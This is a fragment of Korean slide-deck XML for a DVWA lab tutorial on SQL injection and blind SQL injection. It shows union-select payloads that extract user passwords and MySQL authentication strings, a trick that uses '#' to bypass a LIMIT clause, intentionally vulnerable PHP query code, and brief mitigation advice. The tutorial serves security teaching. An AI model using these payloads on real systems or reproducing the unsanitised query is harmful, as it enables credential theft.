          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556172" y="3317496"/>
            <a:ext cx="918269" cy="1972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3FE0A0E-0308-44E1-A656-127393AC442D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556172" y="3774696"/>
            <a:ext cx="1002060" cy="1972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0C404B-75E8-4F94-AA38-DC02923A94A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556172" y="4231896"/>
            <a:ext cx="1002060" cy="1972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B1CD7EF-1D66-4AEC-AB83-4C96D1C50EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422822" y="4682033"/>
            <a:ext cx="1002060" cy="1972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5D83074-EDD7-466E-9894-ABDF7A3FAE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="5139233"/>
            <a:ext cx="1002060" cy="1972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69F8F6A-7C6F-4F96-96B4-EC8791400B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554238" y="5599114"/>
            <a:ext cx="870644" cy="1972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398DB37-2035-4FB0-B55F-E5E6F0B731AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554238" y="6053633"/>
            <a:ext cx="1002060" cy="1972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8F1D6AC-6771-49FB-8218-B0AE5879E155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554237" y="6528028"/>
            <a:ext cx="1084063" cy="1972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423317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06953E51-FC6C-4E3F-B982-872C22804918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708066"/>
            <a:ext cx="5901779" cy="2834140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1’ union select user, password from users#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를 입력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상위 구문을 통해 최종 사용자 아이디와 패스워드를 추출하였다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패스워드 부분은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Hash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값으로 암호화 되어있다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추가적으로 암호를 획득하기 위해서는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hash-identifier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를 통해 종류를 파악하고 암호화를 깨부수도록 추가적으로 작업을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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해야한다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2099AC0-67B0-40AE-8E12-B64BA27599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72380" y="1755125"/>
            <a:ext cx="5958930" cy="4866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3B5F33A-DD1A-4801-8EE8-E868E4633229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975397" y="3831627"/>
            <a:ext cx="3787228" cy="264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6B0AE5D-299A-42D0-8BB0-4EA19C0C5B1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975397" y="4486275"/>
            <a:ext cx="3787228" cy="1797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A1DB7A-4AF5-439A-B875-1A779C2C828B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975397" y="5066036"/>
            <a:ext cx="3787228" cy="2584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E811D5E-6543-4E48-B656-758DECBF3163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975397" y="5709121"/>
            <a:ext cx="3787228" cy="177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2416DAA-0264-4DBB-A94B-841C125E6C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975397" y="6263171"/>
            <a:ext cx="3787228" cy="2970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0801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407D7F5-007E-425F-9321-BFF479959489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9541" y="1755126"/>
            <a:ext cx="6004618" cy="7861300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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SQL Injection Source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b="1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vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1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/source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1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low.php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if( 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isset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 $_REQUEST[ 'Submit' ] ) ) {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// Get input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$id = $_REQUEST[ 'id' ];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​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// Check database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$query = "SELECT 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first_name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last_name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FROM users WHERE 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user_id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sz="1100" b="1" kern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'$id';";</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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$result = 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mysqli_query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($GLOBALS["___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mysqli_ston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"], $query ) or die( '&lt;pre&gt;' . ((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is_object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($GLOBALS["___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mysqli_ston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"])) ? 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mysqli_error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($GLOBALS["___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mysqli_ston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"]) : (($___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mysqli_res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= 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mysqli_connect_error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()) ? $___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mysqli_res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: false)) . '&lt;/pre&gt;' );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​// Get results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while( $row = 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mysqli_fetch_assoc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 $result ) ) {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// Get values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$first = $row["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first_name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"];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$last = $row["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last_name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"];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​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// Feedback for end user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echo "&lt;pre&gt;ID: {$id}&lt;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br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/&gt;First name: {$first}&lt;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br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 /&gt;Surname: {$last}&lt;/pre&gt;";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}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l" fontAlgn="base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mysqli_close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($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern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mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern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"]);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" kern="100" dirty="0">
              <a:effectLst/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A850F99D-34E2-403E-9BDE-B85A84DB25DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="4820938"/>
            <a:ext cx="1409700" cy="2558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92658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018CF5-3D79-4847-B173-70692EC8197E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7419264"/>
            <a:ext cx="5913238" cy="2270834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Low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레벨과는 다르게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id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부분에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‘ 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작은 따옴표가 없는 걸 보니 숫자만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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입력받겠다고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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설정한 것으로 확인된다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D3C850B-8180-46F4-8833-6427A24C64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6691" y="1858083"/>
            <a:ext cx="6004619" cy="4646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0E5B1E-C7A2-4459-912F-FB3348203C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8081" y="6685656"/>
            <a:ext cx="5913238" cy="46814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3043121-9259-438B-A998-9788FA58CD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5619749" y="6697937"/>
            <a:ext cx="561975" cy="3886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905618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88C7648F-F251-4245-B7AF-1302E7E8F94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3646" y="4357040"/>
            <a:ext cx="5913238" cy="2270834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User ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800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를 선택하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1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Submit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CE6B4CE-B0FB-4FAE-99CB-743699385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98" y="1828798"/>
            <a:ext cx="6118686" cy="2403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7CE8F1-F68A-4126-A83A-F3454BB7E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1" y="4785971"/>
            <a:ext cx="5958929" cy="29126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EB6ECF-29D1-40F8-A014-97FFA593AE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369655" y="7913974"/>
            <a:ext cx="61186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화면 아래에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id=1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이 보인다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앞의 화면에서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User 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로 선택한 뒤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Submit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버튼을 눌렀기 때문에 웹서버로 이용자가 선택한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id=1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Submit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버튼을 눌렀다는 것을 전달하는 요청이다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버프스위트가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 그 요청을 중간에서 가로채어 웹서버로 전달하지 않고 대기중인 것이다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나눔스퀘어_ac Bold" panose="020B0600000101010101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DF35AF-99ED-496A-B02F-D74C69051C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="7351055"/>
            <a:ext cx="1323975" cy="26412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57236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42AFA0-6DA2-4598-9D26-F92970BC897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921" y="3347652"/>
            <a:ext cx="5913238" cy="6165057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화면 아래에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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id=1 </a:t>
            </a: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보인다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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앞의 화면에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 ID</a:t>
            </a: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선택한 뒤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a: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눌렀기 때문에 웹서버로     이용자가 선택한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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id=1</a:t>
            </a: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 </a:t>
            </a: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눌렀다는 것을 전달하는 요청이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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b="0" i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버프스위트가</a:t>
            </a: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 요청을 중간에서     가로채어 웹서버로 전달하지 않고 대기중인 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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0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버프스위트에서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forword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클릭해보자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2000" b="0" i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4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2A2A851-A8EA-4F81-A5E6-BF286D84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4" y="1900082"/>
            <a:ext cx="6065925" cy="784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A1BB329-85C2-44E1-A037-C9F89BA7BB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1032340" y="1981200"/>
            <a:ext cx="5006509" cy="6248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48692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9E20563-38EF-4993-91A8-2782B8042A2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6309248"/>
            <a:ext cx="5913238" cy="2270834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원래는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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정보만 보여야 하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Gordon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Bod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 더 많은 이름들이 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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algn="l"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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자체가 취약점이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" i="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EF2F49F-D156-4327-8C50-4C5D27EB9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94" y="1755125"/>
            <a:ext cx="6178658" cy="41757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1C5BC5-C88A-4374-B8B0-68FFD20FD9DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693174" y="3421626"/>
            <a:ext cx="2735826" cy="2509212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78421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0FEDC6E4-D332-4388-91C3-746AC54631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690" y="6739638"/>
            <a:ext cx="6050309" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr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2200" kern="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버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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프스위트에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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2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union select user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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authentication_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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#&amp;Submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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을 입력해주면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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자체의 사용자 계정명과 암호화 되었지만 비밀번호가 보인다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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2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계정은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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22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관리하는 관리자들이 사용하는 계정이고 웹서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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접속할 때 사용할 수도 있는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정보이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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5583465-4AC5-43B8-AB91-361D44DFB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2" y="1886414"/>
            <a:ext cx="6349993" cy="915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59D8A3-1DF0-409C-A86E-57BFDCBC9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1" y="2684745"/>
            <a:ext cx="5381625" cy="3305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FE9809F-2FF0-4951-BFEF-F4ADE0FF1C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693174" y="4232787"/>
            <a:ext cx="1755058" cy="516194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2F819F-AB86-477A-93E8-ACEDC89190AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693173" y="5304954"/>
            <a:ext cx="1932039" cy="684966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329947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A3F8AAB-4AE0-454A-903A-5D0C001137D2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690" y="6739638"/>
            <a:ext cx="6050309" cy="2270834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 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="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user,password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from users# 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구문 사용으로 작은 따옴표를 제거해주면 정상적으로 원하는 결과를 얻을 수 있다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User_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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를 도출 할 수 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AD5184C9-5DCE-47D5-8AA2-0FB77ADB5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42" y="2099884"/>
            <a:ext cx="6116102" cy="9829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411572-1A65-4C82-9628-66B2FDD88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56" y="3104849"/>
            <a:ext cx="5702984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03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phpMyAdmin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-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database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EAA0BDC-6DCE-4539-868E-8909DA88EE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2" t="230" r="-184" b="-180"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="896950" y="1946932"/>
            <a:ext cx="5100411" cy="3132716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921" y="8645632"/>
            <a:ext cx="5913238" cy="8030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phpMyAdmin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에서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베이스를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생성하여준다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B65CC83-EB54-45A7-BC4E-DDF4596FC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54" y="5292412"/>
            <a:ext cx="5111407" cy="316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7578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8D25334-D655-404C-BF55-981EE03DFF78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6708066"/>
            <a:ext cx="5913238" cy="2270834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Id=‘$id’=LIMIT 1,”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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부분이 있습니다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LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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이라는 것을 통해 출력되는 레코드의 수를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개로 조절합니다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$id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뒤에 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“#”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을 붙이게 되면 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#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뒷부분은 모두 주석처리가 되기 때문에 이러한 제한을 우회 할 수가 있다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LIMIT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제한을 우회하여 모든 값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="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추출시킬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수 있게 된다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2C37E4A-6BB9-4593-A9B5-233278CA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16" y="1625600"/>
            <a:ext cx="6164677" cy="355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FF938D-F0F0-4FB8-9D01-F548B8803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69" y="5488220"/>
            <a:ext cx="6211057" cy="5950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CC78E97-555E-4E6C-AA88-AE786A908568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5027169" y="5454257"/>
            <a:ext cx="1358450" cy="45295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47840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658674-D22A-4DC3-98ED-5E7F6B5B7852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3845" y="7344362"/>
            <a:ext cx="5913238" cy="2270834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상위의 구문 마지막에 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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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을 붙임으로써 모든 계정의 값들을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="10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추출시킬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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수 있게 됩니다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EB4A8487-BA50-4E7A-8BB2-E04417493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1" y="1719617"/>
            <a:ext cx="5913238" cy="4909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197BE4-07CF-4161-8921-8E2B61CA7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45" y="6680144"/>
            <a:ext cx="6050310" cy="589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64F8E55-12ED-47BD-8710-42C83245CD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="6800850"/>
            <a:ext cx="5844702" cy="3714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07545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88B1565-59DE-4C6A-993F-716B9B9D720D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대응방안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              </a:rPr>
              <a:t>Lv</a:t>
            </a:r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 Impossible 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참고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691" y="6271072"/>
            <a:ext cx="5913238" cy="3162487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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Impossible 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소스코드를 참고해보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="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dvwa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에서는 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id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1,2,3,4,5 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형식으로 되어있습니다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그렇기에 입력되는 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ID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가 숫자인지 먼저 구분을 하고 문자를 입력해야 할 경우에는 허용되는 문자만 사용 가능하도록 제한을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="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걸어둬야</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0"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해당 서비스에 필요한 데이터 형식을 제대로 숙지하고 우회기법을 사용하지 못하도록 사전에 취약점을 보완하도록 하자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="10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3-7) SQL Injection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341CE4F-20A6-4063-87A2-1FA38423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58" y="1640840"/>
            <a:ext cx="6046442" cy="43712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D29BFAD-B7B4-46F9-93E0-9072D97278CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5267324" y="3383308"/>
            <a:ext cx="1209675" cy="2266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761083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9A351A-DCCD-4BAC-94BF-632B61B5151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7D94560D-C34C-4211-8812-E8601EBA9B8D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16541F1C-A245-42F8-8FC8-701268C41998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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE419C1-CCEB-48FC-84BE-079C3DB5FC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="135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SQL Injection (Blind)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66579-EDC9-4324-B476-6FF19928A34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101244" y="3309457"/>
            <a:ext cx="1912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3-8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74764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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508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/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="제목 3"/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ko-KR" sz="2800">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>BLIND SQL INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t> 이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/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/>
                <a:ea typeface="나눔스퀘어_ac Bold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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="5163779"/>
            <a:ext cx="5913236" cy="4475512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ts val="2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ts val="2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Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2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ts val="22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Blind SQL Injection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은 임의의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SQL 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구문을 삽입하여 인가되지 않은 데이터를 열람 할 수 있는 공격 방법이라는 점에서 일반적인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SQL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Injection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과 동일하다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ts val="22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다만 일반적인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SQL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Injection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의 경우에는 조작된 쿼리를 입력 해 한번에 원하는 데이터를 얻을 수 있지만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 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Blind SQL Injection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은 쿼리 결과에 따른 서버의 참과 거짓 반응을 통해 공격을 수행한다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ts val="22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즉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,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 쿼리에 대한 결과가 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="17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참일떄와</a:t>
            </a:r>
            <a:r>
              <a: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 거짓일 때 서버의 반응이 나타나야 하며 이를 구분할 수 있어야 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.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3142" y="1830161"/>
            <a:ext cx="5551714" cy="31228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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508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/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="제목 3"/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ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Security Level : Low</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13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472382" y="1813195"/>
            <a:ext cx="2461318" cy="53654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2000" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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14" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/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/>
                <a:ea typeface="나눔스퀘어_ac Bold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66460" y="2820351"/>
            <a:ext cx="4696480" cy="1638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텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="4710818"/>
            <a:ext cx="5913236" cy="79825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결과를 항상 참으로 만드는 쿼리문을 삽입하여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User ID exists in the database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는 참의 출력 값 이라는걸 확인한다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80760" y="5542203"/>
            <a:ext cx="4696480" cy="15813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텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7233823"/>
            <a:ext cx="5913236" cy="79825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이번엔 반대로 거짓인 쿼리문을 삽입하여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User ID is MISSING from the database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’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은 거짓 출력 값 이라는걸 확인한다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20" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512791" y="1813195"/>
            <a:ext cx="2766117" cy="798258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※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 Blind SQL injection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은 쿼리 결과의 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거짓으로부터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DB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값을 유출해 내는 기법이다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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="8379546"/>
            <a:ext cx="5913236" cy="1165651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＊ 이런 경우에는 공격과정이 좀 더 길어 이를 간소화하는 전문 도구를 이용한다면 쉽게 공격이 가능해진다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이를 위해 본 실습에서는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burp suite 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와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sqlmap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을 이용한다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4003" y="673100"/>
            <a:ext cx="6349993" cy="8965121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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508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/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="제목 3"/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ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>SQL Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>(low)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
